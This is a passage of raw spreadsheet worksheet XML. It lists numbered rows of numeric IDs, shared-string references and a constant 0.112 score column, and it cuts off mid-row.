        <v>2.8532573E7</v>
      </c>
      <c r="C31032" s="2" t="s">
        <v>29841</v>
      </c>
      <c r="D31032" s="2">
        <v>1.0</v>
      </c>
      <c r="E31032" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31032" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31033" ht="15.75" customHeight="1">
      <c r="A31033" s="1">
        <v>12397.0</v>
      </c>
      <c r="B31033" s="2">
        <v>2.8931885E7</v>
      </c>
      <c r="C31033" s="2" t="s">
        <v>29842</v>
      </c>
      <c r="D31033" s="2">
        <v>1.0</v>
      </c>
      <c r="E31033" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31033" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31034" ht="15.75" customHeight="1">
      <c r="A31034" s="1">
        <v>12490.0</v>
      </c>
      <c r="B31034" s="2">
        <v>2.9536621E7</v>
      </c>
      <c r="C31034" s="2" t="s">
        <v>29843</v>
      </c>
      <c r="D31034" s="2">
        <v>1.0</v>
      </c>
      <c r="E31034" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31034" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31035" ht="15.75" customHeight="1">
      <c r="A31035" s="1">
        <v>12762.0</v>
      </c>
      <c r="B31035" s="2">
        <v>3.1173607E7</v>
      </c>
      <c r="C31035" s="2" t="s">
        <v>29844</v>
      </c>
      <c r="D31035" s="2">
        <v>1.0</v>
      </c>
      <c r="E31035" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31035" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31036" ht="15.75" customHeight="1">
      <c r="A31036" s="1">
        <v>12842.0</v>
      </c>
      <c r="B31036" s="2">
        <v>3.1762864E7</v>
      </c>
      <c r="C31036" s="2" t="s">
        <v>29845</v>
      </c>
      <c r="D31036" s="2">
        <v>1.0</v>
      </c>
      <c r="E31036" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31036" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31037" ht="15.75" customHeight="1">
      <c r="A31037" s="1">
        <v>12883.0</v>
      </c>
      <c r="B31037" s="2">
        <v>3.1987654E7</v>
      </c>
      <c r="C31037" s="2" t="s">
        <v>29846</v>
      </c>
      <c r="D31037" s="2">
        <v>1.0</v>
      </c>
      <c r="E31037" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31037" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31038" ht="15.75" customHeight="1">
      <c r="A31038" s="1">
        <v>13149.0</v>
      </c>
      <c r="B31038" s="2">
        <v>3.3815302E7</v>
      </c>
      <c r="C31038" s="2" t="s">
        <v>29847</v>
      </c>
      <c r="D31038" s="2">
        <v>1.0</v>
      </c>
      <c r="E31038" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31038" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31039" ht="15.75" customHeight="1">
      <c r="A31039" s="1">
        <v>13203.0</v>
      </c>
      <c r="B31039" s="2">
        <v>3.4132221E7</v>
      </c>
      <c r="C31039" s="2" t="s">
        <v>29848</v>
      </c>
      <c r="D31039" s="2">
        <v>1.0</v>
      </c>
      <c r="E31039" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31039" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31040" ht="15.75" customHeight="1">
      <c r="A31040" s="1">
        <v>13554.0</v>
      </c>
      <c r="B31040" s="2">
        <v>3.5659102E7</v>
      </c>
      <c r="C31040" s="2" t="s">
        <v>29849</v>
      </c>
      <c r="D31040" s="2">
        <v>1.0</v>
      </c>
      <c r="E31040" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31040" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31041" ht="15.75" customHeight="1">
      <c r="A31041" s="1">
        <v>13767.0</v>
      </c>
      <c r="B31041" s="2">
        <v>3.6518503E7</v>
      </c>
      <c r="C31041" s="2" t="s">
        <v>29850</v>
      </c>
      <c r="D31041" s="2">
        <v>1.0</v>
      </c>
      <c r="E31041" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31041" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31042" ht="15.75" customHeight="1">
      <c r="A31042" s="1">
        <v>13907.0</v>
      </c>
      <c r="B31042" s="2">
        <v>3.7092397E7</v>
      </c>
      <c r="C31042" s="2" t="s">
        <v>29851</v>
      </c>
      <c r="D31042" s="2">
        <v>1.0</v>
      </c>
      <c r="E31042" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31042" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31043" ht="15.75" customHeight="1">
      <c r="A31043" s="1">
        <v>14014.0</v>
      </c>
      <c r="B31043" s="2">
        <v>3.7462901E7</v>
      </c>
      <c r="C31043" s="2" t="s">
        <v>29852</v>
      </c>
      <c r="D31043" s="2">
        <v>1.0</v>
      </c>
      <c r="E31043" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31043" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31044" ht="15.75" customHeight="1">
      <c r="A31044" s="1">
        <v>14083.0</v>
      </c>
      <c r="B31044" s="2">
        <v>3.7683691E7</v>
      </c>
      <c r="C31044" s="2" t="s">
        <v>29853</v>
      </c>
      <c r="D31044" s="2">
        <v>1.0</v>
      </c>
      <c r="E31044" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31044" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31045" ht="15.75" customHeight="1">
      <c r="A31045" s="1">
        <v>14458.0</v>
      </c>
      <c r="B31045" s="2">
        <v>3.9449521E7</v>
      </c>
      <c r="C31045" s="2" t="s">
        <v>29854</v>
      </c>
      <c r="D31045" s="2">
        <v>1.0</v>
      </c>
      <c r="E31045" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31045" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31046" ht="15.75" customHeight="1">
      <c r="A31046" s="1">
        <v>14471.0</v>
      </c>
      <c r="B31046" s="2">
        <v>3.9505972E7</v>
      </c>
      <c r="C31046" s="2" t="s">
        <v>29855</v>
      </c>
      <c r="D31046" s="2">
        <v>1.0</v>
      </c>
      <c r="E31046" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31046" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31047" ht="15.75" customHeight="1">
      <c r="A31047" s="1">
        <v>14527.0</v>
      </c>
      <c r="B31047" s="2">
        <v>3.9805671E7</v>
      </c>
      <c r="C31047" s="2" t="s">
        <v>29856</v>
      </c>
      <c r="D31047" s="2">
        <v>1.0</v>
      </c>
      <c r="E31047" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31047" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31048" ht="15.75" customHeight="1">
      <c r="A31048" s="1">
        <v>14654.0</v>
      </c>
      <c r="B31048" s="2">
        <v>4.0419317E7</v>
      </c>
      <c r="C31048" s="2" t="s">
        <v>29857</v>
      </c>
      <c r="D31048" s="2">
        <v>1.0</v>
      </c>
      <c r="E31048" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31048" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31049" ht="15.75" customHeight="1">
      <c r="A31049" s="1">
        <v>14741.0</v>
      </c>
      <c r="B31049" s="2">
        <v>4.071215E7</v>
      </c>
      <c r="C31049" s="2" t="s">
        <v>29858</v>
      </c>
      <c r="D31049" s="2">
        <v>1.0</v>
      </c>
      <c r="E31049" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31049" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31050" ht="15.75" customHeight="1">
      <c r="A31050" s="1">
        <v>15556.0</v>
      </c>
      <c r="B31050" s="2">
        <v>4.3406596E7</v>
      </c>
      <c r="C31050" s="2" t="s">
        <v>29859</v>
      </c>
      <c r="D31050" s="2">
        <v>1.0</v>
      </c>
      <c r="E31050" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31050" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31051" ht="15.75" customHeight="1">
      <c r="A31051" s="1">
        <v>15693.0</v>
      </c>
      <c r="B31051" s="2">
        <v>4.3883697E7</v>
      </c>
      <c r="C31051" s="2" t="s">
        <v>29860</v>
      </c>
      <c r="D31051" s="2">
        <v>1.0</v>
      </c>
      <c r="E31051" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31051" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31052" ht="15.75" customHeight="1">
      <c r="A31052" s="1">
        <v>15818.0</v>
      </c>
      <c r="B31052" s="2">
        <v>4.4267395E7</v>
      </c>
      <c r="C31052" s="2" t="s">
        <v>29861</v>
      </c>
      <c r="D31052" s="2">
        <v>1.0</v>
      </c>
      <c r="E31052" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31052" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31053" ht="15.75" customHeight="1">
      <c r="A31053" s="1">
        <v>16307.0</v>
      </c>
      <c r="B31053" s="2">
        <v>4.5924661E7</v>
      </c>
      <c r="C31053" s="2" t="s">
        <v>29862</v>
      </c>
      <c r="D31053" s="2">
        <v>1.0</v>
      </c>
      <c r="E31053" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31053" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31054" ht="15.75" customHeight="1">
      <c r="A31054" s="1">
        <v>16362.0</v>
      </c>
      <c r="B31054" s="2">
        <v>4.6114878E7</v>
      </c>
      <c r="C31054" s="2" t="s">
        <v>29863</v>
      </c>
      <c r="D31054" s="2">
        <v>1.0</v>
      </c>
      <c r="E31054" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31054" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31055" ht="15.75" customHeight="1">
      <c r="A31055" s="1">
        <v>16610.0</v>
      </c>
      <c r="B31055" s="2">
        <v>4.7053876E7</v>
      </c>
      <c r="C31055" s="2" t="s">
        <v>29864</v>
      </c>
      <c r="D31055" s="2">
        <v>1.0</v>
      </c>
      <c r="E31055" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31055" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31056" ht="15.75" customHeight="1">
      <c r="A31056" s="1">
        <v>16971.0</v>
      </c>
      <c r="B31056" s="2">
        <v>4.829645E7</v>
      </c>
      <c r="C31056" s="2" t="s">
        <v>29865</v>
      </c>
      <c r="D31056" s="2">
        <v>1.0</v>
      </c>
      <c r="E31056" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31056" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31057" ht="15.75" customHeight="1">
      <c r="A31057" s="1">
        <v>17026.0</v>
      </c>
      <c r="B31057" s="2">
        <v>4.8462909E7</v>
      </c>
      <c r="C31057" s="2" t="s">
        <v>29866</v>
      </c>
      <c r="D31057" s="2">
        <v>1.0</v>
      </c>
      <c r="E31057" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31057" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31058" ht="15.75" customHeight="1">
      <c r="A31058" s="1">
        <v>17062.0</v>
      </c>
      <c r="B31058" s="2">
        <v>4.8565121E7</v>
      </c>
      <c r="C31058" s="2" t="s">
        <v>29867</v>
      </c>
      <c r="D31058" s="2">
        <v>1.0</v>
      </c>
      <c r="E31058" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31058" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31059" ht="15.75" customHeight="1">
      <c r="A31059" s="1">
        <v>17323.0</v>
      </c>
      <c r="B31059" s="2">
        <v>4.934234E7</v>
      </c>
      <c r="C31059" s="2" t="s">
        <v>29868</v>
      </c>
      <c r="D31059" s="2">
        <v>1.0</v>
      </c>
      <c r="E31059" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31059" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31060" ht="15.75" customHeight="1">
      <c r="A31060" s="1">
        <v>17994.0</v>
      </c>
      <c r="B31060" s="2">
        <v>5.1400735E7</v>
      </c>
      <c r="C31060" s="2" t="s">
        <v>29869</v>
      </c>
      <c r="D31060" s="2">
        <v>1.0</v>
      </c>
      <c r="E31060" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31060" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31061" ht="15.75" customHeight="1">
      <c r="A31061" s="1">
        <v>18705.0</v>
      </c>
      <c r="B31061" s="2">
        <v>5.3642806E7</v>
      </c>
      <c r="C31061" s="2" t="s">
        <v>29870</v>
      </c>
      <c r="D31061" s="2">
        <v>1.0</v>
      </c>
      <c r="E31061" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31061" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31062" ht="15.75" customHeight="1">
      <c r="A31062" s="1">
        <v>18734.0</v>
      </c>
      <c r="B31062" s="2">
        <v>5.37135E7</v>
      </c>
      <c r="C31062" s="2" t="s">
        <v>29871</v>
      </c>
      <c r="D31062" s="2">
        <v>1.0</v>
      </c>
      <c r="E31062" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31062" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31063" ht="15.75" customHeight="1">
      <c r="A31063" s="1">
        <v>19247.0</v>
      </c>
      <c r="B31063" s="2">
        <v>5.5110687E7</v>
      </c>
      <c r="C31063" s="2" t="s">
        <v>29872</v>
      </c>
      <c r="D31063" s="2">
        <v>1.0</v>
      </c>
      <c r="E31063" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31063" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31064" ht="15.75" customHeight="1">
      <c r="A31064" s="1">
        <v>19574.0</v>
      </c>
      <c r="B31064" s="2">
        <v>5.6147951E7</v>
      </c>
      <c r="C31064" s="2" t="s">
        <v>29873</v>
      </c>
      <c r="D31064" s="2">
        <v>1.0</v>
      </c>
      <c r="E31064" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31064" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31065" ht="15.75" customHeight="1">
      <c r="A31065" s="1">
        <v>19596.0</v>
      </c>
      <c r="B31065" s="2">
        <v>5.6182858E7</v>
      </c>
      <c r="C31065" s="2" t="s">
        <v>29874</v>
      </c>
      <c r="D31065" s="2">
        <v>1.0</v>
      </c>
      <c r="E31065" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31065" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31066" ht="15.75" customHeight="1">
      <c r="A31066" s="1">
        <v>19625.0</v>
      </c>
      <c r="B31066" s="2">
        <v>5.6260589E7</v>
      </c>
      <c r="C31066" s="2" t="s">
        <v>29875</v>
      </c>
      <c r="D31066" s="2">
        <v>1.0</v>
      </c>
      <c r="E31066" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31066" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31067" ht="15.75" customHeight="1">
      <c r="A31067" s="1">
        <v>19853.0</v>
      </c>
      <c r="B31067" s="2">
        <v>5.7151182E7</v>
      </c>
      <c r="C31067" s="2" t="s">
        <v>29876</v>
      </c>
      <c r="D31067" s="2">
        <v>1.0</v>
      </c>
      <c r="E31067" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31067" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31068" ht="15.75" customHeight="1">
      <c r="A31068" s="1">
        <v>20129.0</v>
      </c>
      <c r="B31068" s="2">
        <v>1.0054675E7</v>
      </c>
      <c r="C31068" s="2" t="s">
        <v>29877</v>
      </c>
      <c r="D31068" s="2">
        <v>1.0</v>
      </c>
      <c r="E31068" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31068" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31069" ht="15.75" customHeight="1">
      <c r="A31069" s="1">
        <v>20373.0</v>
      </c>
      <c r="B31069" s="2">
        <v>1.1826154E7</v>
      </c>
      <c r="C31069" s="2" t="s">
        <v>29878</v>
      </c>
      <c r="D31069" s="2">
        <v>1.0</v>
      </c>
      <c r="E31069" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31069" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31070" ht="15.75" customHeight="1">
      <c r="A31070" s="1">
        <v>20498.0</v>
      </c>
      <c r="B31070" s="2">
        <v>1.2881709E7</v>
      </c>
      <c r="C31070" s="2" t="s">
        <v>29879</v>
      </c>
      <c r="D31070" s="2">
        <v>1.0</v>
      </c>
      <c r="E31070" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31070" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31071" ht="15.75" customHeight="1">
      <c r="A31071" s="1">
        <v>20672.0</v>
      </c>
      <c r="B31071" s="2">
        <v>1.439508E7</v>
      </c>
      <c r="C31071" s="2" t="s">
        <v>29880</v>
      </c>
      <c r="D31071" s="2">
        <v>1.0</v>
      </c>
      <c r="E31071" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31071" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31072" ht="15.75" customHeight="1">
      <c r="A31072" s="1">
        <v>21481.0</v>
      </c>
      <c r="B31072" s="2">
        <v>2.2980252E7</v>
      </c>
      <c r="C31072" s="2" t="s">
        <v>29881</v>
      </c>
      <c r="D31072" s="2">
        <v>1.0</v>
      </c>
      <c r="E31072" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31072" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31073" ht="15.75" customHeight="1">
      <c r="A31073" s="1">
        <v>21818.0</v>
      </c>
      <c r="B31073" s="2">
        <v>2.6914436E7</v>
      </c>
      <c r="C31073" s="2" t="s">
        <v>29882</v>
      </c>
      <c r="D31073" s="2">
        <v>1.0</v>
      </c>
      <c r="E31073" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31073" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31074" ht="15.75" customHeight="1">
      <c r="A31074" s="1">
        <v>21966.0</v>
      </c>
      <c r="B31074" s="2">
        <v>2.9073898E7</v>
      </c>
      <c r="C31074" s="2" t="s">
        <v>29883</v>
      </c>
      <c r="D31074" s="2">
        <v>1.0</v>
      </c>
      <c r="E31074" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31074" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31075" ht="15.75" customHeight="1">
      <c r="A31075" s="1">
        <v>22289.0</v>
      </c>
      <c r="B31075" s="2">
        <v>3.3494102E7</v>
      </c>
      <c r="C31075" s="2" t="s">
        <v>29884</v>
      </c>
      <c r="D31075" s="2">
        <v>1.0</v>
      </c>
      <c r="E31075" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31075" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31076" ht="15.75" customHeight="1">
      <c r="A31076" s="1">
        <v>22480.0</v>
      </c>
      <c r="B31076" s="2">
        <v>3.6889937E7</v>
      </c>
      <c r="C31076" s="2" t="s">
        <v>29885</v>
      </c>
      <c r="D31076" s="2">
        <v>1.0</v>
      </c>
      <c r="E31076" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31076" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31077" ht="15.75" customHeight="1">
      <c r="A31077" s="1">
        <v>22490.0</v>
      </c>
      <c r="B31077" s="2">
        <v>3.7072851E7</v>
      </c>
      <c r="C31077" s="2" t="s">
        <v>29886</v>
      </c>
      <c r="D31077" s="2">
        <v>1.0</v>
      </c>
      <c r="E31077" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31077" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31078" ht="15.75" customHeight="1">
      <c r="A31078" s="1">
        <v>23190.0</v>
      </c>
      <c r="B31078" s="2">
        <v>5235659.0</v>
      </c>
      <c r="C31078" s="2" t="s">
        <v>29887</v>
      </c>
      <c r="D31078" s="2">
        <v>1.0</v>
      </c>
      <c r="E31078" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31078" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31079" ht="15.75" customHeight="1">
      <c r="A31079" s="1">
        <v>23291.0</v>
      </c>
      <c r="B31079" s="2">
        <v>5.3854699E7</v>
      </c>
      <c r="C31079" s="2" t="s">
        <v>29888</v>
      </c>
      <c r="D31079" s="2">
        <v>1.0</v>
      </c>
      <c r="E31079" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31079" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31080" ht="15.75" customHeight="1">
      <c r="A31080" s="1">
        <v>23775.0</v>
      </c>
      <c r="B31080" s="2">
        <v>7585498.0</v>
      </c>
      <c r="C31080" s="2" t="s">
        <v>29889</v>
      </c>
      <c r="D31080" s="2">
        <v>1.0</v>
      </c>
      <c r="E31080" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31080" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31081" ht="15.75" customHeight="1">
      <c r="A31081" s="1">
        <v>23880.0</v>
      </c>
      <c r="B31081" s="2">
        <v>8375348.0</v>
      </c>
      <c r="C31081" s="2" t="s">
        <v>29890</v>
      </c>
      <c r="D31081" s="2">
        <v>1.0</v>
      </c>
      <c r="E31081" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31081" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31082" ht="15.75" customHeight="1">
      <c r="A31082" s="1">
        <v>24096.0</v>
      </c>
      <c r="B31082" s="2">
        <v>9807286.0</v>
      </c>
      <c r="C31082" s="2" t="s">
        <v>29891</v>
      </c>
      <c r="D31082" s="2">
        <v>1.0</v>
      </c>
      <c r="E31082" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31082" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31083" ht="15.75" customHeight="1">
      <c r="A31083" s="1">
        <v>24141.0</v>
      </c>
      <c r="B31083" s="2">
        <v>1.0054674E7</v>
      </c>
      <c r="C31083" s="2" t="s">
        <v>29877</v>
      </c>
      <c r="D31083" s="2">
        <v>1.0</v>
      </c>
      <c r="E31083" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31083" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31084" ht="15.75" customHeight="1">
      <c r="A31084" s="1">
        <v>24502.0</v>
      </c>
      <c r="B31084" s="2">
        <v>1.1091709E7</v>
      </c>
      <c r="C31084" s="2" t="s">
        <v>29892</v>
      </c>
      <c r="D31084" s="2">
        <v>1.0</v>
      </c>
      <c r="E31084" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31084" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31085" ht="15.75" customHeight="1">
      <c r="A31085" s="1">
        <v>24761.0</v>
      </c>
      <c r="B31085" s="2">
        <v>1.1826153E7</v>
      </c>
      <c r="C31085" s="2" t="s">
        <v>29878</v>
      </c>
      <c r="D31085" s="2">
        <v>1.0</v>
      </c>
      <c r="E31085" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31085" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31086" ht="15.75" customHeight="1">
      <c r="A31086" s="1">
        <v>25075.0</v>
      </c>
      <c r="B31086" s="2">
        <v>1.2881708E7</v>
      </c>
      <c r="C31086" s="2" t="s">
        <v>29893</v>
      </c>
      <c r="D31086" s="2">
        <v>1.0</v>
      </c>
      <c r="E31086" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31086" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31087" ht="15.75" customHeight="1">
      <c r="A31087" s="1">
        <v>25367.0</v>
      </c>
      <c r="B31087" s="2">
        <v>1.3593361E7</v>
      </c>
      <c r="C31087" s="2" t="s">
        <v>29894</v>
      </c>
      <c r="D31087" s="2">
        <v>1.0</v>
      </c>
      <c r="E31087" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31087" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31088" ht="15.75" customHeight="1">
      <c r="A31088" s="1">
        <v>25395.0</v>
      </c>
      <c r="B31088" s="2">
        <v>1.3705181E7</v>
      </c>
      <c r="C31088" s="2" t="s">
        <v>29895</v>
      </c>
      <c r="D31088" s="2">
        <v>1.0</v>
      </c>
      <c r="E31088" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31088" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31089" ht="15.75" customHeight="1">
      <c r="A31089" s="1">
        <v>25414.0</v>
      </c>
      <c r="B31089" s="2">
        <v>1.3782537E7</v>
      </c>
      <c r="C31089" s="2" t="s">
        <v>29896</v>
      </c>
      <c r="D31089" s="2">
        <v>1.0</v>
      </c>
      <c r="E31089" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31089" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31090" ht="15.75" customHeight="1">
      <c r="A31090" s="1">
        <v>25559.0</v>
      </c>
      <c r="B31090" s="2">
        <v>1.4280844E7</v>
      </c>
      <c r="C31090" s="2" t="s">
        <v>29897</v>
      </c>
      <c r="D31090" s="2">
        <v>1.0</v>
      </c>
      <c r="E31090" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31090" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31091" ht="15.75" customHeight="1">
      <c r="A31091" s="1">
        <v>25933.0</v>
      </c>
      <c r="B31091" s="2">
        <v>1.519351E7</v>
      </c>
      <c r="C31091" s="2" t="s">
        <v>29898</v>
      </c>
      <c r="D31091" s="2">
        <v>1.0</v>
      </c>
      <c r="E31091" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31091" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31092" ht="15.75" customHeight="1">
      <c r="A31092" s="1">
        <v>26620.0</v>
      </c>
      <c r="B31092" s="2">
        <v>1.8041194E7</v>
      </c>
      <c r="C31092" s="2" t="s">
        <v>29899</v>
      </c>
      <c r="D31092" s="2">
        <v>1.0</v>
      </c>
      <c r="E31092" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31092" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31093" ht="15.75" customHeight="1">
      <c r="A31093" s="1">
        <v>26794.0</v>
      </c>
      <c r="B31093" s="2">
        <v>1.8624481E7</v>
      </c>
      <c r="C31093" s="2" t="s">
        <v>29900</v>
      </c>
      <c r="D31093" s="2">
        <v>1.0</v>
      </c>
      <c r="E31093" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31093" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31094" ht="15.75" customHeight="1">
      <c r="A31094" s="1">
        <v>27012.0</v>
      </c>
      <c r="B31094" s="2">
        <v>2.0003117E7</v>
      </c>
      <c r="C31094" s="2" t="s">
        <v>29901</v>
      </c>
      <c r="D31094" s="2">
        <v>1.0</v>
      </c>
      <c r="E31094" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31094" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31095" ht="15.75" customHeight="1">
      <c r="A31095" s="1">
        <v>27059.0</v>
      </c>
      <c r="B31095" s="2">
        <v>2.0359602E7</v>
      </c>
      <c r="C31095" s="2" t="s">
        <v>29902</v>
      </c>
      <c r="D31095" s="2">
        <v>1.0</v>
      </c>
      <c r="E31095" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31095" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31096" ht="15.75" customHeight="1">
      <c r="A31096" s="1">
        <v>27223.0</v>
      </c>
      <c r="B31096" s="2">
        <v>2.0978044E7</v>
      </c>
      <c r="C31096" s="2" t="s">
        <v>29903</v>
      </c>
      <c r="D31096" s="2">
        <v>1.0</v>
      </c>
      <c r="E31096" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31096" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31097" ht="15.75" customHeight="1">
      <c r="A31097" s="1">
        <v>27229.0</v>
      </c>
      <c r="B31097" s="2">
        <v>2.1032227E7</v>
      </c>
      <c r="C31097" s="2" t="s">
        <v>29904</v>
      </c>
      <c r="D31097" s="2">
        <v>1.0</v>
      </c>
      <c r="E31097" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31097" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31098" ht="15.75" customHeight="1">
      <c r="A31098" s="1">
        <v>27979.0</v>
      </c>
      <c r="B31098" s="2">
        <v>2.4019365E7</v>
      </c>
      <c r="C31098" s="2" t="s">
        <v>29905</v>
      </c>
      <c r="D31098" s="2">
        <v>1.0</v>
      </c>
      <c r="E31098" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31098" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31099" ht="15.75" customHeight="1">
      <c r="A31099" s="1">
        <v>28497.0</v>
      </c>
      <c r="B31099" s="2">
